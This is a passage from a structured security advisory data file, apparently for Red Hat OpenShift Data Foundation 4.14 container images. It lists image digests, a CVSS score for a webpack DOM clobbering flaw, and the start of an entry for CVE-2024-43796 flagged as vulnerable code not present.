"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-43796", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:28.106254+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", 